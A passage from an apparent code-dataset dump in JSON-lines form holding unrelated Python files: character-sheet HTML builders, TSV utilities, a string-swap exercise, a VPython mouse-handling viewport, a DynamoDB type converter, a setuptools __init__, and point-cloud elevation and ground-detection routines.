2, 5, 9]]),\n ])\n\ndef abilities_summary():\n return flex_col({'class': 'abilities'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Abilities')),\n *[\n flex_row([\n labeled_text_input('Name', {'class': 'ability-name'}, input_attributes={\n 'name': f'ability_name_{i}',\n }),\n labeled_text_input('Effects', {'class': 'ability-effects'}, input_attributes={\n 'name': f'ability_effects_{i}',\n }),\n ])\n for i in range(10)\n ],\n ])\n\ndef feat_row(level):\n return flex_row({'class': 'summary-row'}, [\n div({'class': 'summary-row-level'}, text_input({\n 'disabled': True,\n 'name': f\"feat_level_{level}\",\n 'value': level,\n })),\n div({'class': 'summary-row-name'}, text_input({'name': f\"feat_name_{level}\"})),\n ])\n\ndef proficiencies():\n return flex_col({'class': 'proficiencies'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Proficiencies')),\n labeled_text_input('Armor', input_attributes={'name': 'prof_armor'}),\n text_input({'name': 'armor_proficiencies'}),\n labeled_text_input('Weapons', input_attributes={'name': 'weapon_proficiencies_1'}),\n text_input({'name': 'weapon_proficiencies_2'}),\n labeled_text_input('Languages', input_attributes={'name': 'language_proficiencies'}),\n ])\n\ndef subsection_header(attributes=None, contents=None):\n attributes, contents = ensure_valid_attributes_and_contents(attributes, contents)\n attributes['class'] = 'subsection-header ' + attributes.get('class', '')\n return flex_col(attributes, contents)\n\ndef equipment():\n return flex_col({'class': 'equipment'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Equipment')),\n *[\n flex_row([\n labeled_text_input('Name', {'class': 'equipment-name'}, {'name': f'equipment_name_{i}'}),\n labeled_text_input('Effects', {'class': 'equipment-effects'}, {'name': f'equipment_effects_{i}'}),\n ])\n for i in range(5)\n ],\n ])\n\ndef archetypes():\n return div({'class': 'inventory'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Archetypes')),\n *[\n text_input({'name': f\"archetypes_{i}\"}) for i in range(4)\n ]\n ])\n\ndef inventory():\n return div({'class': 'inventory'}, [\n flex_wrapper(div({'class': 'section-header'}, 'Inventory')),\n *[\n text_input({'name': f\"inventory_{i}\"}) for i in range(13)\n ]\n ])\n\ndef misc_equipment(body_slot, body_slot_html=None):\n if body_slot_html is None:\n body_slot_html = body_slot.lower()\n return flex_row({'class': body_slot_html}, [\n subsection_header(body_slot),\n labeled_text_input('Name', {'class': 'equipment-name'}, {'name': body_slot_html + '-name'}),\n labeled_text_input('Special', {'class': 'equipment-special'}, {'name': body_slot_html + '-special'}),\n ])\n\ndef personality():\n return flex_col({'class': 'personality'}, [\n div({'class': 'section-header'}, 'Alignment and Deity'),\n div(text_input({'name': 'alignment_and_deity'})),\n div({'class': 'section-header'}, 'Personality and Background'),\n \"\".join([div(text_input({'name': f'personality_and_background_{i}'})) for i in range(5)]),\n div({'class': 'section-header goals-and-flaws'}, 'Goals and Flaws'),\n \"\".join([div(text_input({'name': f'goals_and_flaws_{i}'})) for i in range(2)]),\n ])\n","repo_name":"grantrobertsmith/Rise","sub_path":"character_sheet/third_page.py","file_name":"third_page.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17813996981","text":"import csv\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterable, List\n\nDictRow = Dict[str, Any]\n\n\ndef read_tsv(filename: Path, named_columns: bool = True) -> List[DictRow]:\n \"\"\"Read a named or unnamed tsv file and return a list of row dicts\"\"\"\n result = []\n with open(filename, \"r\", encoding=\"utf-8\") as csvfile:\n if named_columns:\n for dict_row in csv.DictReader(csvfile, delimiter=\"\\t\"):\n result.append(dict_row)\n else:\n for row in csv.reader(csvfile, delimiter=\"\\t\"):\n result.append(dict(enumerate(row)))\n return result\n\n\ndef write_tsv(filename: Path, data: List[DictRow]) -> None:\n \"\"\"Write a named tsv file\"\"\"\n with open(filename, \"w\", encoding=\"utf-8\") as csvfile:\n writer = csv.DictWriter(\n csvfile, fieldnames=list(data[0].keys()), delimiter=\"\\t\"\n )\n writer.writeheader()\n for row in data:\n writer.writerow(row)\n\n\ndef select_columns(\n data: Iterable[DictRow], column_ids: List[str]\n) -> List[List[DictRow]]:\n \"\"\"Select list of \"columns\" from a list of dicts\"\"\"\n columns: List[List[DictRow]] = [[] for _ in column_ids]\n for item in data:\n for column, column_id in zip(columns, column_ids):\n column.append(item[column_id])\n return columns\n\n\ndef join_lists_of_dicts(*inputs: Iterable[DictRow]) -> List[DictRow]:\n \"\"\"Loop through several lists of dicts and join the corresponding elements\"\"\"\n results = []\n for items in zip(*inputs):\n results.append({k: v for item in items for k, v in item.items()})\n return results\n","repo_name":"facebookresearch/stopes","sub_path":"stopes/eval/alti/alti_metrics/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"72"} +{"seq_id":"2027925654","text":"# 문제 설명\n# 문자열 my_string과 정수 num1, num2가 매개변수로 주어질 때, \n# my_string에서 인덱스 num1과 인덱스 num2에 해당하는 문자를 바꾼 문자열을 return 하도록 solution 함수를 완성해보세요.\n\n# 제한사항\n\n# 1 < my_string의 길이 < 100\n# 0 ≤ num1, num2 < my_string의 길이\n# my_string은 소문자로 이루어져 있습니다.\n# num1 ≠ num2\n\n# 입출력 예\n# my_string \tnum1 \tnum2 \tresult\n# \"hello\" \t1 \t2 \t\"hlelo\"\n# \"I love you\" \t3 \t6 \t\"I l veoyou\"\n\ndef solution(my_string, num1, num2):\n answer = ''\n my_string = list(my_string)\n my_string[num1], my_string[num2] = my_string[num2], my_string[num1]\n return answer.join(my_string)\n\n# 3번째 줄: my_string이 문자열이니깐 list로 바꿔준다.\n# 4번째 줄: num1과 인덱스 num2에 해당하는 문자를 바꾼다.\n# 5번째 줄: swap한 문자열을 join()을 이용하여 answer에 붙인다.","repo_name":"oiosu/Programmers_Python","sub_path":"프로그래머스_Level 0/50_인덱스 구하기.py","file_name":"50_인덱스 구하기.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41634544064","text":"from visual import display, set_cursor\nimport platform\n\n# ViewPort, a subclass of cvisual.display, is provided as a way to override certain\n# display methods related to mouse event handling, when it comes to interacting with \n# the scene elements (zoom, rotations etc...)\nclass ViewPort(display):\n def __init__(self, **keywords):\n # invoke normal display constructor ...\n super(ViewPort, self).__init__(**keywords)\n\n # ... and add a few more information:\n # Indicates when an animation automatically zooms in an pans around a focus point\n self._auto_movement = False \n self.plat = platform.system()\n\n def getDisplay(self):\n return super\n\n # method to change the status of _auto_movement\n def _set_autoMovement(self, is_movement):\n self._auto_movement = is_movement\n if is_movement == False:\n self._resetMouse()\n\n def _resetMouse(self):\n self._mt.leftIsDown = self._mt.rightIsDown = self._mt.middleIsDown = 0\n self._mt.lastSpinning = self._mt.lastZooming = 0\n self._mt.macCtrl = 0\n\n def _report_mouse_state(self, evt, defx=20, defy=20): # wx gives x,y relative to upper left corner\n # this method is directly taken from the display class and modified to get the desired effect\n x, y = defx, defy\n if evt != None:\n x, y = evt.GetPosition()\n\n if self._lastx is None:\n self._lastx = x\n self._lasty = y\n\n zooming = self._mt.isZooming(evt, self.userzoom, self.userspin)\n spinning = self._mt.isSpinning(evt, self.userzoom, self.userspin, zooming)\n lock = self._mt.checkLock(spinning, zooming)\n \n if lock and not self._captured:\n self.cursor_state = self.cursor.visible\n set_cursor(self.canvas, False)\n if self.fillswindow:\n self._cursorx, self._cursory = (x, y)\n else:\n # cursor is based on (0,0) of the window; our (x,y) is based on (0,0) of the 3D display\n self._cursorx, self._cursory = (int(self._x)+x, int(self._y)+y)\n self._canvas.CaptureMouse()\n self._captured = True\n elif self._captured and not (spinning or zooming):\n self.win.WarpPointer(self._cursorx, self._cursory)\n self._lastx = x = self._cursorx\n self._lasty = y = self._cursory\n set_cursor(self.canvas, self.cursor_state)\n self._canvas.ReleaseMouse() \n self._captured = False\n \n \n #\n # So... we're going to report left/right/middle\n #\n\n left = self._mt.leftIsDown and not spinning and not zooming\n right = spinning or self._mt.rightIsDown\n middle = zooming or self._mt.middleIsDown\n shift = evt.ShiftDown()\n ctrl = evt.ControlDown()\n alt = evt.AltDown()\n cmd = evt.CmdDown()\n \n if self.plat == 'Macintosh' and ctrl and cmd:\n #\n # Weird... if the user holds the cmd key, evt.ControlDown() returns True even if it's a lie.\n # So... we don't know if it's *really* down or not. ;-(\n #\n ctrl = False\n \n# labels = [s.strip() for s in \"x, y, left, middle, right, shift, ctrl, alt, cmd, spin, zoom, lock, cap\".split(',')]\n# vals = (x, y, left, middle, right, shift, ctrl, alt, cmd, spinning, zooming, lock, self._captured)\n# fmts = [\"%9s\"]*len(vals)\n# for l,f in zip(labels,fmts):\n# print(f % l, end='')\n# print()\n# for v,f in zip(vals,fmts):\n# print(f % `v`, end='')\n# print()\n## if trigger == 'leftdown' and not self._rightdown:\n## if ctrl:\n## right = 1\n## left = 0\n## elif alt:\n## middle = 1\n## left = 0\n\n# if (spinning or zooming) and (x == self._lastx) and (y == self._lasty): return\n\n # CM: whenever there is an auto_movement, do not call report_mouse_state as it \n # could interfer with camera methods that also call the \"report_mouse_state\"\n # from the display class \n\n if self._auto_movement == True:\n self._resetMouse()\n return \n\n self.report_mouse_state([left, right, middle],\n self._lastx, self._lasty, x, y,\n [shift, ctrl, alt, cmd])\n\n\n # For some reason, handling spin/zoom in terms of movements away\n # from a fixed cursor position fails on the Mac. As you drag the\n # mouse, repeated move mouse events mostly give the fixed cursor position.\n # Hence, for now, dragging off-screen stops spin/zoom on the Mac.\n # Similar problems on Ubuntu 12.04, plus wx.CURSOR_BLANK not available on Linux.\n \n if (spinning or zooming) and (self.plat != 'Macintosh'): # reset mouse to original location\n self.win.WarpPointer(self._cursorx, self._cursory)\n if self.fillswindow:\n self._lastx = self._cursorx\n self._lasty = self._cursory\n else:\n # cursor is based on (0,0) of the window; our (x,y) is based on (0,0) of the 3D display\n self._lastx = self._cursorx - int(self._x)\n self._lasty = self._cursory - int(self._y)\n else: \n self._lastx = x\n self._lasty = y\n \n\n\nclass Color:\n black = (0,0,0)\n white = (1,1,1)\n whiteish = (0.9, 0.9, 0.9)\n grey = (0.5,0.5,0.5)\n deepgrey = (0.32, 0.32, 0.32)\n darkgrey = (0.04, 0.04, 0.04)\n lightgrey = (0.75,0.75,0.75)\n\n red = (1,0,0)\n redish = (0.5, 0, 0)\n green = (0,1,0)\n greenish = (0, 0.5, 0)\n blue = (0,0,1)\n blueish = (0, 0, 0.5)\n darkblue = (0, 0, 0.2)\n\n yellow = (1,1,0)\n yellowish = (0.5, 0.5, 0)\n cyan = (0,1,1)\n cyanish = (0, 0.5, 0.5)\n magenta = (1,0,1)\n magentish = (0.5, 0, 0.5)\n dirtyYellow = (0.5,0.5,0)\n orange = (1,0.6,0)\n #nightshade = (0.12, 0.12, 0.12)\n nightshade = (0.05, 0.05, 0.05)\n\n","repo_name":"crmathieu/Orbital","sub_path":"celestial/vpython_interface.py","file_name":"vpython_interface.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20184973737","text":"# -*- coding: utf-8 -*-\nimport logging\nimport ast\nfrom .sql.common import Functions\nfrom datetime import datetime, date\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Callable, Dict, Optional, Set, List, Union, Type\n\n_logger = logging.getLogger(__name__) # type: ignore\n\n\nclass Serializer(metaclass=ABCMeta):\n def __init__(\n self,\n mapping: Optional[Dict[Any, Callable[[Optional[str]], Optional[Any]]]] = None,\n ) -> None:\n if mapping is None:\n self._mapping = self.get_default_converters()\n else:\n self._mapping = mapping\n\n @property\n def mapping(self) -> Dict[str, Callable[[Optional[str]], Optional[Any]]]:\n return self._mapping\n\n def _to_string(self, value: Optional[str], **kwargs) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n return {\"S\": value}\n\n def _to_number(\n self, value: Optional[Union[int, float]], **kwargs\n ) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n return {\"N\": str(value)}\n\n def _to_binary(self, value: Optional[bytes], **kwargs) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n return {\"B\": value.decode()}\n\n def _to_set(\n self, value: Optional[Set[Any]], **kwargs\n ) -> Optional[Dict[str, List[str]]]:\n if value is None:\n return None\n\n value_ = next(iter(value))\n if isinstance(value_, type(1)) or isinstance(value_, type(1.0)):\n return {\"NS\": [str(v) for v in value]}\n elif isinstance(value_, type(b\"\")):\n return {\"BS\": [v.decode() for v in value]}\n else:\n return {\"SS\": [v for v in value]}\n\n def _to_map(\n self, value: Optional[Dict[str, Any]], **kwargs\n ) -> Optional[Dict[str, Any]]:\n if value is None:\n return None\n\n converted_ = {}\n for k, v in value.items():\n type_ = type(v)\n converted_[k] = self._mapping.get(type_, None)(v)\n return {\"M\": converted_}\n\n def _to_list(\n self, value: Optional[List[Any]], **kwargs\n ) -> Optional[Dict[str, Any]]:\n if value is None:\n return None\n\n converted_ = []\n for v in value:\n type_ = type(v)\n converted_.append(self._mapping.get(type_, None)(v))\n return {\"L\": converted_}\n\n def _to_null(self, value: Optional[Any], **kwargs) -> Optional[Dict[str, Any]]:\n return {\"NULL\": False if value else True}\n\n def _to_bool(self, value: Optional[bool], **kwargs) -> Optional[Dict[str, Any]]:\n return {\"BOOL\": value}\n\n def _to_datetime(\n self, value: Optional[Union[datetime, date]], **kwargs\n ) -> Optional[Dict[str, str]]:\n if value is None:\n return None\n\n return {\"S\": value.isoformat()}\n\n def _to_default(self, value: Optional[Any], **kwargs) -> Optional[str]:\n return {\"S\": str(value)}\n\n def get(self, type_: Type) -> Callable[[Optional[str]], Optional[Any]]:\n return self._mapping.get(type_, self._to_default)\n\n def get_default_converters(\n self,\n ) -> Dict[Type[Any], Callable[[Optional[str]], Optional[Any]]]:\n return {\n str: self._to_string,\n int: self._to_number,\n float: self._to_number,\n bytes: self._to_binary,\n set: self._to_set,\n dict: self._to_map,\n list: self._to_list,\n type(None): self._to_null,\n bool: self._to_bool,\n datetime: self._to_datetime,\n date: self._to_datetime,\n }\n\n\nclass Deserializer(metaclass=ABCMeta):\n def __init__(\n self,\n mapping: Optional[Dict[Any, Callable[[Optional[str]], Optional[Any]]]] = None,\n ) -> None:\n if mapping is None:\n self._mapping = self.get_default_converters()\n else:\n self._mapping = mapping\n\n @property\n def mapping(self) -> Dict[str, Callable[[Optional[str]], Optional[Any]]]:\n return self._mapping\n\n def _to_string(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n function_ = kwargs.get(\"function\", None)\n\n if function_ == Functions.DATE:\n return self._to_date(value, **kwargs)\n elif function_ == Functions.DATETIME:\n return self._to_datetime(value, **kwargs)\n else:\n return value\n\n def _to_date(self, value: Optional[Any], **kwargs) -> Optional[datetime]:\n function_params_ = kwargs.get(\"function_params\", None)\n if function_params_ is None or len(function_params_) == 0:\n return date.fromisoformat(value)\n else:\n return datetime.strptime(value, function_params_[0]).date()\n\n def _to_datetime(self, value: Optional[Any], **kwargs) -> Optional[datetime]:\n function_params_ = kwargs.get(\"function_params\", None)\n if function_params_ is None or len(function_params_) == 0:\n return datetime.fromisoformat(value)\n else:\n return datetime.strptime(value, function_params_[0])\n\n def _to_number(self, value: Optional[str], **kwargs) -> Optional[Union[int, float]]:\n if value is None:\n return None\n return ast.literal_eval(value)\n\n def _to_binary(self, value: Optional[str], **kwargs) -> Optional[bytes]:\n if value is None:\n return None\n return value\n\n def _to_string_set(\n self, value: Optional[List[str]], **kwargs\n ) -> Optional[Set[str]]:\n if value is None:\n return None\n return set([v for v in value])\n\n def _to_number_set(\n self, value: Optional[List[str]], **kwargs\n ) -> Optional[Set[float]]:\n if value is None:\n return None\n return set([float(v) for v in value])\n\n def _to_binary_set(\n self, value: Optional[List[str]], **kwargs\n ) -> Optional[Set[bytes]]:\n if value is None:\n return None\n return set([v for v in value])\n\n def _to_map(\n self, value: Optional[Dict[str, Any]], **kwargs\n ) -> Optional[Dict[str, Any]]:\n if value is None:\n return None\n\n converted_ = {}\n for k, v in value.items():\n type_, value_ = next(iter(v.items()))\n converted_[k] = self._mapping.get(type_, None)(value_)\n return converted_\n\n def _to_list(self, value: Optional[List[Any]], **kwargs) -> Optional[List[Any]]:\n if value is None:\n return None\n\n coverted_ = []\n for v in value:\n type_, value_ = next(iter(v.items()))\n coverted_.append(self._mapping.get(type_, None)(value_))\n return coverted_\n\n def _to_null(self, value: Optional[bool], **kwargs) -> Optional[bool]:\n return value\n\n def _to_bool(self, value: Optional[bool], **kwargs) -> Optional[bool]:\n return value\n\n def _to_default(self, value: Optional[Any], **kwargs) -> Optional[str]:\n return value\n\n def get(self, type_: str) -> Callable[[Optional[str]], Optional[Any]]:\n return self._mapping.get(type_, self._to_default)\n\n def get_default_converters(\n self,\n ) -> Dict[Any, Callable[[Optional[str]], Optional[Any]]]:\n return {\n \"S\": self._to_string,\n \"N\": self._to_number,\n \"B\": self._to_binary,\n \"SS\": self._to_string_set,\n \"NS\": self._to_number_set,\n \"BS\": self._to_binary_set,\n \"M\": self._to_map,\n \"L\": self._to_list,\n \"NULL\": self._to_null,\n \"BOOL\": self._to_bool,\n }\n\n\nclass Converter(metaclass=ABCMeta):\n def __init__(\n self,\n serializer: Serializer,\n deserializer: Deserializer,\n ) -> None:\n self._serializer = serializer\n self._deserializer = deserializer\n\n @property\n def serializer(self) -> Serializer:\n return self._serializer\n\n @property\n def deserializer(self) -> Deserializer:\n return self._deserializer\n\n def get_serialize_converter(\n self, type_: str\n ) -> Callable[[Optional[str]], Optional[Any]]:\n return self._serializer.get(type_)\n\n def get_deserialize_converter(\n self, type_: str\n ) -> Callable[[Optional[str]], Optional[Any]]:\n return self._deserializer.get(type_)\n\n @abstractmethod\n def serialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n raise NotImplementedError # pragma: no cover\n\n @abstractmethod\n def deserialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n raise NotImplementedError # pragma: no cover\n\n\nclass DefaultTypeConverter(Converter):\n def __init__(self) -> None:\n super().__init__(\n serializer=Serializer(),\n deserializer=Deserializer(),\n )\n\n def serialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n type_ = type(value)\n converter = self.get_serialize_converter(type_)\n return converter(value, **kwargs)\n\n def deserialize(self, value: Optional[Any], **kwargs) -> Optional[Any]:\n type_, value_ = next(iter(value.items()))\n converter = self.get_deserialize_converter(type_)\n return converter(value_, **kwargs)\n","repo_name":"passren/PyDynamoDB","sub_path":"pydynamodb/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":9278,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"17504353855","text":"\"\"\"Extensions to the 'distutils' for large or complex distributions\"\"\"\nfrom setuptools.extension import Extension, Library\nfrom setuptools.dist import Distribution, Feature, _get_unpatched\nimport distutils.core, setuptools.command\nfrom setuptools.depends import Require\nfrom distutils.core import Command as _Command\nfrom distutils.util import convert_path\nimport os\nimport sys\n\n__version__ = '0.6'\n__all__ = [\n 'setup', 'Distribution', 'Feature', 'Command', 'Extension', 'Require',\n 'find_packages'\n]\n\n# This marker is used to simplify the process that checks is the\n# setuptools package was installed by the Setuptools project\n# or by the Distribute project, in case Setuptools creates\n# a distribution with the same version.\n#\n# The distribute_setup script for instance, will check if this\n# attribute is present to decide whether to reinstall the package\n# or not.\n_distribute = True\n\nbootstrap_install_from = None\n\n# If we run 2to3 on .py files, should we also convert docstrings?\n# Default: yes; assume that we can detect doctests reliably\nrun_2to3_on_doctests = True\n# Standard package names for fixer packages\nlib2to3_fixer_packages = ['lib2to3.fixes']\n\ndef find_packages(where='.', exclude=()):\n \"\"\"Return a list all Python packages found within directory 'where'\n\n 'where' should be supplied as a \"cross-platform\" (i.e. URL-style) path; it\n will be converted to the appropriate local path syntax. 'exclude' is a\n sequence of package names to exclude; '*' can be used as a wildcard in the\n names, such that 'foo.*' will exclude all subpackages of 'foo' (but not\n 'foo' itself).\n \"\"\"\n out = []\n stack=[(convert_path(where), '')]\n while stack:\n where,prefix = stack.pop(0)\n for name in os.listdir(where):\n fn = os.path.join(where,name)\n if ('.' not in name and os.path.isdir(fn) and\n os.path.isfile(os.path.join(fn,'__init__.py'))\n ):\n out.append(prefix+name); stack.append((fn,prefix+name+'.'))\n for pat in list(exclude)+['ez_setup', 'distribute_setup']:\n from fnmatch import fnmatchcase\n out = [item for item in out if not fnmatchcase(item,pat)]\n return out\n\nsetup = distutils.core.setup\n\n_Command = _get_unpatched(_Command)\n\nclass Command(_Command):\n __doc__ = _Command.__doc__\n\n command_consumes_arguments = False\n\n def __init__(self, dist, **kw):\n # Add support for keyword arguments\n _Command.__init__(self,dist)\n for k,v in kw.items():\n setattr(self,k,v)\n\n def reinitialize_command(self, command, reinit_subcommands=0, **kw):\n cmd = _Command.reinitialize_command(self, command, reinit_subcommands)\n for k,v in kw.items():\n setattr(cmd,k,v) # update command with keywords\n return cmd\n\nimport distutils.core\ndistutils.core.Command = Command # we can't patch distutils.cmd, alas\n\ndef findall(dir = os.curdir):\n \"\"\"Find all files under 'dir' and return the list of full filenames\n (relative to 'dir').\n \"\"\"\n all_files = []\n for base, dirs, files in os.walk(dir):\n if base==os.curdir or base.startswith(os.curdir+os.sep):\n base = base[2:]\n if base:\n files = [os.path.join(base, f) for f in files]\n all_files.extend(filter(os.path.isfile, files))\n return all_files\n\nimport distutils.filelist\ndistutils.filelist.findall = findall # fix findall bug in distutils.\n\n# sys.dont_write_bytecode was introduced in Python 2.6.\nif ((hasattr(sys, \"dont_write_bytecode\") and sys.dont_write_bytecode) or\n (not hasattr(sys, \"dont_write_bytecode\") and os.environ.get(\"PYTHONDONTWRITEBYTECODE\"))):\n _dont_write_bytecode = True\nelse:\n _dont_write_bytecode = False\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"services/collaboration/komob-server/lib/python2.6/site-packages/distribute-0.6.14-py2.6.egg/setuptools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"12667233517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 14 15:30:53 2019\n\n@author: alien\n\"\"\"\n\nimport numpy as np\n\nfrom sklearn.neighbors import KDTree\n\nfrom skimage.measure import label\nfrom skimage.transform import resize\n\n# Import functions to read and write ply files\nfrom utils.ply import write_ply, read_ply\n\nimport time\n\nimport matplotlib.pyplot as plt\n\nfrom alienlab import *\n\nimport scipy.ndimage.morphology as morpho\nimport skimage.morphology as skmorpho\n\nfrom progressbar import ProgressBar\n#%%\n# ------------------------------------------------------------------------------------------\n#\n# Functions\n# \\***************/\n\nbar = ProgressBar()\n\n \ndef get_elevation(cloud, kx, ky):\n '''\n Generate the elevation images from the point cloud\n Inputs: 3D cloud [stack of arrays]: list of positions x,y,z, and other attributes are acceptable\n ks, ky [float] parameter for height to voxel conversion\n \n Outputs: elevation images: array of at least 4 images:\n minimal elevation, maximal elevation, range, accumulation\n and if provided class and labels of the projected points\n reverse projection: list of tuples containing \n -the set of points projected onto each voxel,\n -among those, points whose elevation is lower then 5mm above minimal elevation\n -maximal elevation below 5mm of maximal elevation\n \n '''\n\n points = np.copy(cloud)\n #point cloud limits\n point_cloud_max = np.max(points, 0)\n point_cloud_min = np.min(points, 0)\n \n #converion into voxel limits\n x_max = (point_cloud_max[0]/kx).astype(int)\n x_min = (point_cloud_min[0]/kx).astype(int)\n \n y_max = (point_cloud_max[1]/ky).astype(int)\n y_min = (point_cloud_min[1]/ky).astype(int)\n \n #outputs to fill\n elevation_image = []\n reverse_projection = []\n \n points_vox = np.copy(points)\n #Assignment to voxel values\n points_vox[:,0] = (points[:,0]/kx).astype(int)\n points_vox[:,1] = (points[:,1]/ky).astype(int)\n \n #minimal elevation of the point cloud\n zmin = point_cloud_min[2]\n \n #Scan the xy grid to update the elevation images\n #Could be probably faster with np.unique which I discovered later on...\n for x in bar(range(x_min, x_max)):\n x_ind = points_vox[:,0] == x\n points_x = points[x_ind]\n P_locx = points_vox[x_ind]\n val_ind = np.where(x_ind)[0]\n \n for y in range(y_min, y_max):\n y_ind = P_locx[:,1] == y\n points_y = points_x[y_ind] \n \n if len(points_y) != 0:\n val_ind2 = val_ind[y_ind]\n #maximal elevation \n maxi = np.max(points_y[:,2])\n #minimal elevation\n mini = np.min(points_y[:,2])\n \n #Points with close minimal or maximal elevation (especially minimal for ground assignment)\n eps = 0.05\n ind_max = val_ind2[np.abs(points_y[:, 2]-maxi) < eps]\n ind_min = val_ind2[np.abs(points_y[:, 2] - mini) < eps]\n \n if cloud.shape[1] == 3: #point clous x, y, z\n \n elevation_image.append([x, y, maxi-zmin, mini-zmin, \n maxi - mini, len(points_y)])\n else: #point clous x, y, z, label, class\n elevation_image.append([x, y, maxi-zmin, mini-zmin, maxi - mini, \n len(points_y), points[ind_max[0], -2], points[ind_max[0], -1]])\n \n reverse_projection.append((val_ind2, ind_max, ind_min))\n return np.array(elevation_image), reverse_projection\n\n \ndef region_criterion(P1, P2, lbd): \n '''Selection criterion for ground region growth\n inputs: P1 [array]: image patch neighbour of the seed\n P2 [float]: elevation of the seed\n lbd [float]: difference of elevatioon constraint\n ''' \n crit = (np.abs(P1-P2) < lbd) * (P1 != 0) \n return crit\n\n\ndef lambda_flat2(im, r = 25, C1 = 2):\n '''Region growth to detect the ground'''\n Lx, Ly = im.shape\n \n aux = np.copy(im)\n #Set the background to maximal value to avoid including it in the region growth\n aux[im == 0] = np.max(im)\n #Initial seed should be in the ground, highly probable if taken among the \n #points with an elevation around 0% of the elevation histogram\n #This parameter works fairly well on different point clouds\n v = np.percentile(aux, 0.2, interpolation = 'lower')\n #seed selection\n seed = np.where(aux == v)\n i = int(seed[0][0])\n j = int(seed[1][0]) \n \n #Region to fill with ground\n region = np.zeros((Lx, Ly), dtype=bool)\n \n #Seed lists: actual and memorial\n Q = []\n Q_mem = []\n #memorize the seeds that have already been used\n #to avoid using them again\n\n Q.append(j*Lx + i)\n Q_mem.append(seed)\n\n\n \n while len(Q) > 0:\n #exxtract the seed\n p_ind = Q.pop()\n \n i = p_ind % Lx\n j = p_ind // Lx\n \n P2 = im[i, j]\n region[i, j] += 1\n #Characteristics of the seed\n #Deal with limit condition problems when extracting neighborhood\n #Source: Gabriel Peyre NL-means patch-wise denoising - Numerical tours for Python\n [X,Y] = np.meshgrid(np.arange(i-r,i + r+1),np.arange(j-r,j + r +1))\n X[X < 0] = 1-X[X < 0] \n Y[Y < 0] = 1-Y[Y < 0]\n X[X >= Lx] = 2*Lx-X[X >= Lx]-1\n Y[Y >= Ly] = 2*Ly-Y[Y >= Ly]-1\n \n \n P1 = im[X, Y]\n #Neighborhood selection\n \n crit1 = region_criterion(P1, P2, C1)\n #Elevation difference criterion\n \n region[X*crit1, Y*crit1] = region[i, j]\n #update the region\n \n #potential new seeds \n crit2 = np.zeros((2*r + 1, 2*r + 1), dtype = bool)\n crit2[r, 0] = True\n crit2[0, r] = True\n crit2[2*r, r]= True\n crit2[r, 2*r] = True\n\n #new seeds selection\n new_seeds = X[crit2*crit1] + Y[crit2*crit1]*Lx\n new_seeds = new_seeds.tolist()\n seeds = [x for x in new_seeds if x not in Q_mem]\n #check they have not been used yet\n Q_mem+=seeds\n Q+=seeds\n #print(len(Q))\n #add relevant new seeds to the seed bank\n return region\n \n \ndef make_image(elevation_image, original_shape, im_type = 0):\n '''Build elevation images from elevation projection of the point cloud.\n input: elevation_image [array of images] output of get_elevation, or subpart of it\n original_shape [array of images] full output of get_elevation\n im_type: \n -0: maximal elevation image\n -1: minimal elevation image\n -2: elevation range image\n -3: accumulation image\n -4, 5, 6... image made of the supplementary information of the point cloud (labels, classes)\n output: image from the output of get_elevation function\n mask marking the non-zero pixels in this image, for reverse projection\n '''\n #original shape is needed because the image needs to respect the dimension of the whole point\n #cloud projection to be transferable to other operations with other images\n \n #image basis\n MINS = np.min(original_shape[:, 0:2], axis = 0)\n L_X, L_Y = np.max(original_shape[:, 0:2], axis = 0) - MINS \n im = np.zeros((int(L_X+1.), int(L_Y+1.)))\n #mask to locate the points that have been updated\n #important for reverse projection\n mask = np.zeros(im.shape).astype(bool)\n im_type = int(im_type + 2) #which elevation image to build\n\n \n for i in range(elevation_image.shape[0]):\n x, y = int(elevation_image[i, 0]-MINS[0]), int(elevation_image[i, 1]-MINS[1])\n\n im[x, y] = elevation_image[i, im_type]\n mask[x, y] = True\n \n return im, mask\n\ndef make_binary(im_in, thresh, dtyp = 'int'):\n #Binarize an image given a threshold thresh. Output type can be specified\n im = np.copy(im_in)\n im[im <= thresh] = False\n im[im > thresh] = True\n if dtyp == 'int':\n return im.astype(int)\n else: \n return im.astype('bool')\n \ndef image_to_2Dcloud(im, elevation_mask):\n #reverse projection: from image to list of index. Backward operation of \"make image\"\n im = im.reshape(-1, order = 'C')\n elevation_mask = elevation_mask.reshape(-1, order = 'C')\n \n mount_cloud = im[elevation_mask]\n \n \n return mount_cloud\n \n \ndef conv_2D_3D(mount_cloud, ground, reverse_proj, points):\n #backward operation of \"get elevation\"\n \n a, b, c = zip(*reverse_proj)\n N = np.max(mount_cloud)\n N = int(N)\n u = np.linspace(0, N, N + 1)\n np.random.shuffle(u)\n is_obj = np.zeros(points.shape[0])\n for i in range(len(mount_cloud)):\n ind = a[i]\n is_obj[ind] = u[mount_cloud[i]]\n if ground[i] == 1 and mount_cloud[i] != 0:\n potential_ground = c[i]\n #print(np.min(np.abs(points[potential_ground, 